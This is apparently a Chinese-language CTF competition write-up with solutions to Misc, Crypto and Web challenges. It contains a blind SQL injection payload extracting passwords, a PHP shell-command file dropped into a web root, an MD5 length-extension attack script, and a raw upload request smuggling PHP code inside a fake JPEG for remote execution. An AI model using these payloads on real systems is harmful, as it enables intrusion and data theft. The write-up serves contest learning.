Misc
1.sqlshark
wireshark导出所有http包为json。然后写个脚本筛选即可。
from json import *
r = loads(open("res.json","r",encoding="utf-8").read())
res = []
for i in range(0,len(r),2):
t = list(r[i]["_source"]["layers"]["urlencoded-form"].keys())[-1]
if "correct" not in list(r[i+1]["_source"]["layers"]["data-text-lines"].keys())[-1]:
if "if(((((ord(substr((select(group_concat(password))from(users)) from" in r[i]["_source"]["layers"]["urlencoded-form"][t]["urlencoded-form.value"].lower():
res.append(r[i]["_source"]["layers"]["urlencoded-form"][t]["urlencoded-form.value"].lower()
.replace("any'/**/or/**/(if(((((ord(substr((select(group_concat(password))from(users)) from ","")
.replace("))),1,0))#","").replace(" for 1))))in(",","))
for i in res:
i = i.split(",")
print(chr(int(i[-1])),end="")2.OnlyLocalSql
ssh连上。
cd /var/www/html
cat << EOF >> flag.php
<?php echo `ls /f*`;
EOF
curl http://localhost:80即可。
也可以加个ssh -L 转发到本地但是没必要()
3.LearnOpenGL
感觉我的是非预期啊
shaders包中,去掉sprite和particle然后打开就能直接看到了()
4.ez_msb
249=>11111001。
数据在第二位放着。主要问题是msb。并不是很想用python写一个实现出来于是直接用了GNU Radio Companion
5.问卷调查
下次还填非常简单。
Crypto
1.SignAhead
md5长度扩展攻击。
hashpump编译不起然后找到了另外一个
from pwn import *
import HashTools
context.log_level = 'info'
P = remote("manqiu.top",20924)
md5 = HashTools.MD5()
for i in range(100):
P.readline()
msg = bytes.fromhex(P.readline().decode().split(":")[1].strip())
print("[*] msg:",msg)
sign = P.readline().decode().split(":")[1].strip()
print("[*] sign:",sign)
md5 = HashTools.MD5()
P.readline()
nmsg , nsign = md5.extension(32,msg,b"233",signature=sign)
print("[*] nmsg:",nmsg.hex())
print("[*] nsign:",nsign)
P.sendlineafter(b": ",nmsg.hex().encode())
P.sendlineafter(b": ",nsign.encode())
print(P.readline())
print(P.recvline())
P.close()2.basiccry
传进去一个超递增/递减序列然后可以直接得到某一行的值。
from pwn import *
context.log_level = 'info'
P = remote("manqiu.top",21175)
r = "".join(str(i)+"," for i in [2**i for i in range(255,-1,-1)]).encode()
r = r[:-1]
P.sendlineafter(b":",r)
cc = []
for i in range(256):
l = []
v = (P.recvline().decode().strip('\n')).strip().strip('[]').split(' ')
for _ in v:
if(_=='1' or _=='0'):
l.append(int(_))
cc.append(l)
l = []
v = (P.recvline().decode().strip('\n')).strip('()').split(',')
v = [int(i) for i in v]
P.close()
l = []
r = 2**255
d = v[0]
r = 2**255
ans = ""
while r != 0:
if d >= r:
d -= r
ans += "1"
else:
ans += "0"
r //= 2
cc = list(cc[0])
for i in range(len(cc)):
cc[i] -= int(ans[i])
cc[i] = cc[i] % 2
for i in range(0,len(list(cc)),8):
print(chr(int("".join(map(str,list(cc[i:i+8]))),2)),end="")Web
1.Checkin
直接F12然后在game.js中发现变量_0x3d9d。
2.TrySent
POST /user/upload/upload HTTP/1.1
Host: target.com
Cookie: PHPSESSID=7901b5229557c94bad46e16af23a3728
Content-Length: 894
Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Accept: */*
Origin: https://info.ziwugu.vip/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target.com/user/upload/index?name=icon&type=image&limit=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ja-CN;q=0.8,ja;q=0.7,en;q=0.6
Connection: close
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="id"
WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="name"
test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="type"
image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="lastModifiedDate"
Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="size"
164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/jpeg
JFIF
<?php RCE;?>
------WebKitFormBoundaryrhx2kYAMYDqoTThz--3.codefever_again
https://github.com/PGYER/codefever/issues/140